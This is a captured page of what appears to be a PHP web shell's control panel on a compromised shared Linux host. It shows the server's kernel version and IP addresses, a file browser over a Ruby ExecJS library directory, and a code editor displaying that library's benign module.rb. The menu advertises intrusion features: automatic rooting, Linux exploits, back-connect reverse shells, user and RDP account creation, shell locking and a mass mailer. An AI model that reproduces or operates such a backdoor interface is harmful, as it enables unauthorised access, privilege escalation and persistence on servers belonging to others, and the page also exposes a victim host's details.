Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
execjs /
[ HOME SHELL ]
Name
Size
Permission
Action
support
[ DIR ]
drwxr-xr-x
disabled_runtime.rb
447
B
-rw-r--r--
duktape_runtime.rb
1.67
KB
-rw-r--r--
encoding.rb
760
B
-rw-r--r--
external_runtime.rb
6.58
KB
-rw-r--r--
mini_racer_runtime.rb
2.33
KB
-rw-r--r--
module.rb
955
B
-rw-r--r--
ruby_rhino_runtime.rb
2.39
KB
-rw-r--r--
runtime.rb
2.02
KB
-rw-r--r--
runtimes.rb
2.62
KB
-rw-r--r--
version.rb
38
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.rb
require "execjs/version" require "rbconfig" module ExecJS class Error < ::StandardError; end class RuntimeError < Error; end class ProgramError < Error; end class RuntimeUnavailable < RuntimeError; end class << self attr_reader :runtime def runtime=(runtime) raise RuntimeUnavailable, "#{runtime.name} is unavailable on this system" unless runtime.available? @runtime = runtime end def exec(source, options = {}) runtime.exec(source, options) end def eval(source, options = {}) runtime.eval(source, options) end def compile(source, options = {}) runtime.compile(source, options) end def root @root ||= File.expand_path("..", __FILE__) end def windows? @windows ||= RbConfig::CONFIG["host_os"] =~ /mswin|mingw/ end def cygwin? @cygwin ||= RbConfig::CONFIG["host_os"] =~ /cygwin/ end end end
Close